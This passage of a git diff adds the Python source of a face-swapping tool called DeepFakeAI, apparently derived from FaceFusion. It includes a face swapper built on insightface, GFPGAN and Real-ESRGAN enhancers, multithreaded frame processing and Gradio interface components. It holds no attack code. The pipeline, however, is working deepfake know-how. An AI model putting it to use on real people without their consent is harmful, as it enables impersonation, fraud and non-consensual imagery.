0000000000000000000000000000000000000000..a868cc7770ad4847ecf68c82bdc0f4d4b6c961b2 Binary files /dev/null and b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/core.py b/DeepFakeAI/processors/frame/core.py new file mode 100644 index 0000000000000000000000000000000000000000..8a44cb2413b53b88dec2d65667ef0e8b2fe11e72 --- /dev/null +++ b/DeepFakeAI/processors/frame/core.py @@ -0,0 +1,113 @@ +import os +import sys +import importlib +import psutil +from concurrent.futures import ThreadPoolExecutor, as_completed +from queue import Queue +from types import ModuleType +from typing import Any, List, Callable +from tqdm import tqdm + +import DeepFakeAI.globals +from DeepFakeAI import wording + +FRAME_PROCESSORS_MODULES : List[ModuleType] = [] +FRAME_PROCESSORS_METHODS =\ +[ + 'get_frame_processor', + 'clear_frame_processor', + 'pre_check', + 'pre_process', + 'process_frame', + 'process_frames', + 'process_image', + 'process_video', + 'post_process' +] + + +def load_frame_processor_module(frame_processor : str) -> Any: + try: + frame_processor_module = importlib.import_module('DeepFakeAI.processors.frame.modules.' + frame_processor) + for method_name in FRAME_PROCESSORS_METHODS: + if not hasattr(frame_processor_module, method_name): + raise NotImplementedError + except ModuleNotFoundError: + sys.exit(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor)) + except NotImplementedError: + sys.exit(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor)) + return frame_processor_module + + +def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]: + global FRAME_PROCESSORS_MODULES + + if not FRAME_PROCESSORS_MODULES: + for frame_processor in frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + FRAME_PROCESSORS_MODULES.append(frame_processor_module) + return FRAME_PROCESSORS_MODULES + + +def clear_frame_processors_modules() -> None: + global FRAME_PROCESSORS_MODULES + + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + frame_processor_module.clear_frame_processor() + FRAME_PROCESSORS_MODULES = [] + + +def multi_process_frame(source_path : str, temp_frame_paths : List[str], process_frames: Callable[[str, List[str], Any], None], update: Callable[[], None]) -> None: + with ThreadPoolExecutor(max_workers = DeepFakeAI.globals.execution_thread_count) as executor: + futures = [] + queue = create_queue(temp_frame_paths) + queue_per_future = max(len(temp_frame_paths) // DeepFakeAI.globals.execution_thread_count * DeepFakeAI.globals.execution_queue_count, 1) + while not queue.empty(): + future = executor.submit(process_frames, source_path, pick_queue(queue, queue_per_future), update) + futures.append(future) + for future in as_completed(futures): + future.result() + + +def create_queue(temp_frame_paths : List[str]) -> Queue[str]: + queue: Queue[str] = Queue() + for frame_path in temp_frame_paths: + queue.put(frame_path) + return queue + + +def pick_queue(queue : Queue[str], queue_per_future : int) -> List[str]: + queues = [] + for _ in range(queue_per_future): + if not queue.empty(): + queues.append(queue.get()) + return queues + + +def process_video(source_path : str, frame_paths : List[str], process_frames : Callable[[str, List[str], Any], None]) -> None: + progress_bar_format = '{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, {rate_fmt}{postfix}]' + total = len(frame_paths) + with tqdm(total = total, desc = wording.get('processing'), unit = 'frame', dynamic_ncols = True, bar_format = progress_bar_format) as progress: + multi_process_frame(source_path, frame_paths, process_frames, lambda: update_progress(progress)) + + +def update_progress(progress : Any = None) -> None: + process = psutil.Process(os.getpid()) + memory_usage = process.memory_info().rss / 1024 / 1024 / 1024 + progress.set_postfix( + { + 'memory_usage': '{:.2f}'.format(memory_usage).zfill(5) + 'GB', + 'execution_providers': DeepFakeAI.globals.execution_providers, + 'execution_thread_count': DeepFakeAI.globals.execution_thread_count, + 'execution_queue_count': DeepFakeAI.globals.execution_queue_count + }) + progress.refresh() + progress.update(1) + + +def get_device() -> str: + if 'CUDAExecutionProvider' in DeepFakeAI.globals.execution_providers: + return 'cuda' + if 'CoreMLExecutionProvider' in DeepFakeAI.globals.execution_providers: + return 'mps' + return 'cpu' diff --git a/DeepFakeAI/processors/frame/modules/__init__.py b/DeepFakeAI/processors/frame/modules/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5169ea224301b6d35797d6df88e7dca5e562d658 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..75acffebdfcae9b8cc81f13b0f0eb2b4e04c8713 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..ecb76b83735c49d9b3360b53d59a09bbc67dabd5 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1a4289669ae04f4ecaeb6ec0bdba0be429f92785 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/face_enhancer.py b/DeepFakeAI/processors/frame/modules/face_enhancer.py new file mode 100644 index 0000000000000000000000000000000000000000..65cfc5f5ef67352315ee8b2215f6cd00f8f6d241 --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/face_enhancer.py @@ -0,0 +1,100 @@ +from typing import Any, List, Callable +import cv2 +import threading +from gfpgan.utils import GFPGANer + +import DeepFakeAI.globals +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI import wording +from DeepFakeAI.core import update_status +from DeepFakeAI.face_analyser import get_many_faces +from DeepFakeAI.typing import Frame, Face +from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video + +FRAME_PROCESSOR = None +THREAD_SEMAPHORE = threading.Semaphore() +THREAD_LOCK = threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_ENHANCER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/GFPGANv1.4.pth') + FRAME_PROCESSOR = GFPGANer( + model_path = model_path, + upscale = 1, + device = frame_processors.get_device() + ) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/GFPGANv1.4.pth']) + return True + + +def pre_process() -> bool: + if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) + return False + return True + + +def post_process() -> None: + clear_frame_processor() + + +def enhance_face(target_face : Face, temp_frame : Frame) -> Frame: + start_x, start_y, end_x, end_y = map(int, target_face['bbox']) + padding_x = int((end_x - start_x) * 0.5) + padding_y = int((end_y - start_y) * 0.5) + start_x = max(0, start_x - padding_x) + start_y = max(0, start_y - padding_y) + end_x = max(0, end_x + padding_x) + end_y = max(0, end_y + padding_y) + crop_frame = temp_frame[start_y:end_y, start_x:end_x] + if crop_frame.size: + with THREAD_SEMAPHORE: + _, _, crop_frame = get_frame_processor().enhance( + crop_frame, + paste_back = True + ) + temp_frame[start_y:end_y, start_x:end_x] = crop_frame + return temp_frame + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + many_faces = get_many_faces(temp_frame) + if many_faces: + for target_face in many_faces: + temp_frame = enhance_face(target_face, temp_frame) + return temp_frame + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(None, None, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + target_frame = cv2.imread(target_path) + result_frame = process_frame(None, None, target_frame) + cv2.imwrite(output_path, result_frame) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + DeepFakeAI.processors.frame.core.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/processors/frame/modules/face_swapper.py b/DeepFakeAI/processors/frame/modules/face_swapper.py new file mode 100644 index 0000000000000000000000000000000000000000..3479b577eb5bf6a9f04ce48e32350fc1490eba12 --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/face_swapper.py @@ -0,0 +1,105 @@ +from typing import Any, List, Callable +import cv2 +import insightface +import threading + +import DeepFakeAI.globals +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI import wording +from DeepFakeAI.core import update_status +from DeepFakeAI.face_analyser import get_one_face, get_many_faces, find_similar_faces +from DeepFakeAI.face_reference import get_face_reference, set_face_reference +from DeepFakeAI.typing import Face, Frame +from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video + +FRAME_PROCESSOR = None +THREAD_LOCK = threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_SWAPPER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/inswapper_128.onnx') + FRAME_PROCESSOR = insightface.model_zoo.get_model(model_path, providers = DeepFakeAI.globals.execution_providers) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx']) + return True + + +def pre_process() -> bool: + if not is_image(DeepFakeAI.globals.source_path): + update_status(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME) + return False + elif not get_one_face(cv2.imread(DeepFakeAI.globals.source_path)): + update_status(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME) + return False + if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) + return False + return True + + +def post_process() -> None: + clear_frame_processor() + + +def swap_face(source_face : Face, target_face : Face, temp_frame : Frame) -> Frame: + return get_frame_processor().get(temp_frame, target_face, source_face, paste_back = True) + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + if 'reference' in DeepFakeAI.globals.face_recognition: + similar_faces = find_similar_faces(temp_frame, reference_face, DeepFakeAI.globals.reference_face_distance) + if similar_faces: + for similar_face in similar_faces: + temp_frame = swap_face(source_face, similar_face, temp_frame) + if 'many' in DeepFakeAI.globals.face_recognition: + many_faces = get_many_faces(temp_frame) + if many_faces: + for target_face in many_faces: + temp_frame = swap_face(source_face, target_face, temp_frame) + return temp_frame + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + source_face = get_one_face(cv2.imread(source_path)) + reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(source_face, reference_face, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + source_face = get_one_face(cv2.imread(source_path)) + target_frame = cv2.imread(target_path) + reference_face = get_one_face(target_frame, DeepFakeAI.globals.reference_face_position) if 'reference' in DeepFakeAI.globals.face_recognition else None + result_frame = process_frame(source_face, reference_face, target_frame) + cv2.imwrite(output_path, result_frame) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + conditional_set_face_reference(temp_frame_paths) + frame_processors.process_video(source_path, temp_frame_paths, process_frames) + + +def conditional_set_face_reference(temp_frame_paths : List[str]) -> None: + if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): + reference_frame = cv2.imread(temp_frame_paths[DeepFakeAI.globals.reference_frame_number]) + reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) + set_face_reference(reference_face) diff --git a/DeepFakeAI/processors/frame/modules/frame_enhancer.py b/DeepFakeAI/processors/frame/modules/frame_enhancer.py new file mode 100644 index 0000000000000000000000000000000000000000..9c5b9e0f783b2805e234b409e658ad4d57cadaed --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/frame_enhancer.py @@ -0,0 +1,88 @@ +from typing import Any, List, Callable +import cv2 +import threading +from basicsr.archs.rrdbnet_arch import RRDBNet +from realesrgan import RealESRGANer + +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI.typing import Frame, Face +from DeepFakeAI.utilities import conditional_download, resolve_relative_path + +FRAME_PROCESSOR = None +THREAD_SEMAPHORE = threading.Semaphore() +THREAD_LOCK = threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FRAME_ENHANCER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/RealESRGAN_x4plus.pth') + FRAME_PROCESSOR = RealESRGANer( + model_path = model_path, + model = RRDBNet( + num_in_ch = 3, + num_out_ch = 3, + num_feat = 64, + num_block = 23, + num_grow_ch = 32, + scale = 4 + ), + device = frame_processors.get_device(), + tile = 512, + tile_pad = 32, + pre_pad = 0, + scale = 4 + ) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/RealESRGAN_x4plus.pth']) + return True + + +def pre_process() -> bool: + return True + + +def post_process() -> None: + clear_frame_processor() + + +def enhance_frame(temp_frame : Frame) -> Frame: + with THREAD_SEMAPHORE: + temp_frame, _ = get_frame_processor().enhance(temp_frame, outscale = 1) + return temp_frame + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + return enhance_frame(temp_frame) + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(None, None, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + target_frame = cv2.imread(target_path) + result = process_frame(None, None, target_frame) + cv2.imwrite(output_path, result) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + frame_processors.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/typing.py b/DeepFakeAI/typing.py new file mode 100644 index 0000000000000000000000000000000000000000..74f2b8746172ce2d58705f073a45c2276766ce60 --- /dev/null +++ b/DeepFakeAI/typing.py @@ -0,0 +1,13 @@ +from typing import Any, Literal +from insightface.app.common import Face +import numpy + +Face = Face +Frame = numpy.ndarray[Any, Any] + +FaceRecognition = Literal[ 'reference', 'many' ] +FaceAnalyserDirection = Literal[ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small' ] +FaceAnalyserAge = Literal[ 'child', 'teen', 'adult', 'senior' ] +FaceAnalyserGender = Literal[ 'male', 'female' ] +TempFrameFormat = Literal[ 'jpg', 'png' ] +OutputVideoEncoder = Literal[ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/uis/__init__.py b/DeepFakeAI/uis/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..7e65d5e72179cfb8a3e34bc8c837be7baf1f70ff Binary files /dev/null and b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..164b847092fe203effcf90fc8bc202f5ac979864 Binary files /dev/null and b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..711667d642e4fc9041427d068f185457b2080f28 Binary files /dev/null and b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__init__.py b/DeepFakeAI/uis/components/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..93d3f0014e15d391031011244703f4a6a66fd6a1 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d0f42183e18c96b373637e15fd1d5f4d2f256d8a Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b7891263d232d951c701fdc93d0c96a10938d04a Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..282b65a6bce2c05a9cc85475072ec753a17d8036 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..968fd092417ddb2f5b4ee5c65c047ac91d0a8431 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..26fd18c65983ebe5d2c2770fd53714e4f48af985 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..77d25365cbede84a457d8bad814bfaa7b0aca6cb Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..653e151a536bd335cc967238441707f766e46efb Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8308ca2a8b3d462af61833ccc5d6a78245788947 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..444b99edbae493ec108dc6385fc904be6d848624 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8cccb58080631ed048f56b813d3d271a76e7c372 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..206d0873d82ad8965b675c0f1d95a202b7e60308 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b1aa889546149e6cc88f235944b73d6e1f6d1a5f Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..28bee96cb9cdbfac53435706cefa670cb0aa31ba Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/about.py b/DeepFakeAI/uis/components/about.py new file mode 100644 index 0000000000000000000000000000000000000000..8e7beed10c76eb9d3d6900563aa2be23897beb28 --- /dev/null +++ b/DeepFakeAI/uis/components/about.py @@ -0,0 +1,13 @@ +from typing import Optional +import gradio + +from DeepFakeAI import metadata + +ABOUT_HTML : Optional[gradio.HTML] = None + + +def render() -> None: + global ABOUT_HTML + + with gradio.Box(): + ABOUT_HTML = gradio.HTML('
' + metadata.get('name') + ' ' + metadata.get('version') + '
') diff --git a/DeepFakeAI/uis/components/benchmark.py b/DeepFakeAI/uis/components/benchmark.py new file mode 100644 index 0000000000000000000000000000000000000000..450cdd0dc82cf74fa203698b66b8860d913917a8 --- /dev/null +++ b/DeepFakeAI/uis/components/benchmark.py @@ -0,0 +1,116 @@ +from typing import Any, Optional, List +import time +import tempfile +import statistics +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame_total +from DeepFakeAI.core import conditional_process +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import normalize_output_path, clear_temp + +BENCHMARK_RESULT_DATAFRAME : Optional[gradio.Dataframe] = None +BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None +BENCHMARK_START_BUTTON : Optional[gradio.Button] = None +BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None + + +def render() -> None: + global BENCHMARK_RESULT_DATAFRAME + global BENCHMARK_CYCLES_SLIDER + global BENCHMARK_START_BUTTON + global BENCHMARK_CLEAR_BUTTON + + with gradio.Box(): + BENCHMARK_RESULT_DATAFRAME = gradio.Dataframe( + label = wording.get('benchmark_result_dataframe_label'), + headers = + [ + 'target_path', + 'benchmark_cycles', + 'average_run', + 'fastest_run', + 'slowest_run', + 'relative_fps' + ], + col_count = (6, 'fixed'), + row_count = (7, 'fixed'), + datatype = + [ + 'str', + 'number', + 'number', + 'number', + 'number', + 'number' + ] + ) + BENCHMARK_CYCLES_SLIDER = gradio.Slider( + label = wording.get('benchmark_cycles_slider_label'), + minimum = 1, + step = 1, + value = 3, + maximum = 10 + ) + with gradio.Row(): + BENCHMARK_START_BUTTON = gradio.Button(wording.get('start_button_label')) + BENCHMARK_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) + + +def listen() -> None: + BENCHMARK_START_BUTTON.click(update, inputs = BENCHMARK_CYCLES_SLIDER, outputs = BENCHMARK_RESULT_DATAFRAME) + BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULT_DATAFRAME) + + +def update(benchmark_cycles : int) -> Update: + DeepFakeAI.globals.source_path = '.assets/examples/source.jpg' + target_paths =\ + [ + '.assets/examples/target-240p.mp4', + '.assets/examples/target-360p.mp4', + '.assets/examples/target-540p.mp4', + '.assets/examples/target-720p.mp4', + '.assets/examples/target-1080p.mp4', + '.assets/examples/target-1440p.mp4', + '.assets/examples/target-2160p.mp4' + ] + value = [ benchmark(target_path, benchmark_cycles) for target_path in target_paths ] + return gradio.update(value = value) + + +def benchmark(target_path : str, benchmark_cycles : int) -> List[Any]: + process_times = [] + total_fps = 0.0 + for i in range(benchmark_cycles + 1): + DeepFakeAI.globals.target_path = target_path + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, tempfile.gettempdir()) + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + start_time = time.perf_counter() + conditional_process() + end_time = time.perf_counter() + process_time = end_time - start_time + fps = video_frame_total / process_time + if i > 0: + process_times.append(process_time) + total_fps += fps + average_run = round(statistics.mean(process_times), 2) + fastest_run = round(min(process_times), 2) + slowest_run = round(max(process_times), 2) + relative_fps = round(total_fps / benchmark_cycles, 2) + return\ + [ + DeepFakeAI.globals.target_path, + benchmark_cycles, + average_run, + fastest_run, + slowest_run, + relative_fps + ] + + +def clear() -> Update: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + return gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/execution.py b/DeepFakeAI/uis/components/execution.py new file mode 100644 index 0000000000000000000000000000000000000000..23de9f5d50b365eeeee50db56af8cc78e6eccf73 --- /dev/null +++ b/DeepFakeAI/uis/components/execution.py @@ -0,0 +1,64 @@ +from typing import List, Optional +import gradio +import onnxruntime + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.face_analyser import clear_face_analyser +from DeepFakeAI.processors.frame.core import clear_frame_processors_modules +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import encode_execution_providers, decode_execution_providers + +EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None +EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None +EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global EXECUTION_PROVIDERS_CHECKBOX_GROUP + global EXECUTION_THREAD_COUNT_SLIDER + global EXECUTION_QUEUE_COUNT_SLIDER + + with gradio.Box(): + EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( + label = wording.get('execution_providers_checkbox_group_label'), + choices = encode_execution_providers(onnxruntime.get_available_providers()), + value = encode_execution_providers(DeepFakeAI.globals.execution_providers) + ) + EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( + label = wording.get('execution_thread_count_slider_label'), + value = DeepFakeAI.globals.execution_thread_count, + step = 1, + minimum = 1, + maximum = 128 + ) + EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( + label = wording.get('execution_queue_count_slider_label'), + value = DeepFakeAI.globals.execution_queue_count, + step = 1, + minimum = 1, + maximum = 16 + ) + + +def listen() -> None: + EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) + EXECUTION_THREAD_COUNT_SLIDER.change(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER, outputs = EXECUTION_THREAD_COUNT_SLIDER) + EXECUTION_QUEUE_COUNT_SLIDER.change(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER, outputs = EXECUTION_QUEUE_COUNT_SLIDER) + + +def update_execution_providers(execution_providers : List[str]) -> Update: + clear_face_analyser() + clear_frame_processors_modules() + DeepFakeAI.globals.execution_providers = decode_execution_providers(execution_providers) + return gradio.update(value = execution_providers) + + +def update_execution_thread_count(execution_thread_count : int = 1) -> Update: + DeepFakeAI.globals.execution_thread_count = execution_thread_count + return gradio.update(value = execution_thread_count) + + +def update_execution_queue_count(execution_queue_count : int = 1) -> Update: + DeepFakeAI.globals.execution_queue_count = execution_queue_count + return gradio.update(value = execution_queue_count) diff --git a/DeepFakeAI/uis/components/face_analyser.py b/DeepFakeAI/uis/components/face_analyser.py new file mode 100644 index 0000000000000000000000000000000000000000..117cd3ee22c36344954ccd18c18f4fabbeeee96d --- /dev/null +++ b/DeepFakeAI/uis/components/face_analyser.py @@ -0,0 +1,54 @@ +from typing import Optional + +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update + +FACE_ANALYSER_DIRECTION_DROPDOWN : Optional[gradio.Dropdown] = None +FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None +FACE_ANALYSER_GENDER_DROPDOWN : 